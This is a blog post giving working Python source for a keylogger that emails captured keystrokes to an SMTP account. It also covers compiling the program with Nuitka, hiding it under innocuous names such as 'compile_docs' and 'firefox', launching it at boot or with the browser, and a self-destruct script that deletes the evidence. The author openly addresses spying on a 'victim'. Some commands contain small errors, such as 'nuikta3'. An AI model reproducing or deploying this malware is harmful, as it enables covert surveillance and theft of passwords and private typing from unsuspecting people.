Author: Jorge Maldonado Ventura
Category: Python
Date: 2023-02-02 14:00
Lang: en
Slug: registrador-de-teclas-keylogger-avanzado-en-python-para-gnu-linux
Tags: hack, keylogger, macOS, Python, security, Windows
Save_as: advanced-keylogger-for-GNU-linux-email-and-self-destruct/index.html
URL: advanced-keylogger-for-GNU-linux-email-and-self-destruct/
Title: Python keylogger for GNU/Linux. Send information by email and self-destruct
Image: <img src="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png" alt="" width="1200" height="675" srcset="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png 1200w, /wp-content/uploads/2023/02/registrador-de-teclas-con-Python-600x337.png 600w" sizes="(max-width: 1200px) 100vw, 1200px">

In this article I show you how to program an advanced keylogger that
sends messages by email and self-destructs after a certain date.

<!-- more -->

The code (we will save it as `compile_docs.py`[^1]) used is the
following:

    :::python
    #!/usr/bin/env python3
    from pynput.keyboard import Key, Listener
    from email.message import EmailMessage
    import smtplib, ssl

    keys = ''

    def on_press(key):
        print(key)
        global keys, count
        keys += str(key)
        print(len(keys),  keys)
        if len(keys) > 190:
            send_email(keys)
            keys = ''

    def send_email(message):
        smtp_server = "CHANGE"
        port = 587
        sender_email = "CHANGE"
        password = "CHANGE"
        receiver_email = sender_email


        em = EmailMessage()
        em.set_content(message)
        em['To'] = receiver_email
        em['From'] = sender_email
        em['Subject'] = 'keylog'

        context = ssl.create_default_context()

        with smtplib.SMTP(smtp_server, port) as s:
            s.ehlo()
            s.starttls(context=context)
            s.ehlo()
            s.login(sender_email, password)
            s.send_message(em)

    with Listener(on_press=on_press) as listener:
        listener.join()

We must replace every `CHANGE` with information for sending the email.
Obviously, the email used must be an anonymous one that you can throw
away. Basically, with the above code we send an email every time several
keys are pressed (when they occupy `190` characters).

Now we are going to compile the code with [Nuitka](https://nuitka.net/):

    :::bash
    sudo pip3 install nuitka
    nuikta3 compile_docs.py

The program will have produced a compiled file called `compile_docs.bin`.
Finally, you need to make that file run when you start a browser or boot
your computer, [as explained in the previous article](/en/basic-keylogger-for-GNU-Linux-to-steal-passwords-and-typed-information/#step2).

If we want to make the program self-destruct after a period of time, we
can create something like this[^2]:

    :::bash
    #!/bin/sh
    DATE=`date +%Y%m%d`
    if [ $DATE > 20230501 ]; then
        rm /usr/share/doc/python3/compile_docs.py
        rm /usr/share/doc/python3/compile_docs.bin
        mv firefox.bin $0  # Removes this file
    else
        python3 nuestro_keylogger.py
    fi

The steps to remove the keylogger may vary slightly depending on how you
have hidden it.

[^1]: This is an example name, it is best to use a name that does not
    attract the attention of our victim.
[^2]: The file would be saved as `firefox` or any similar program.
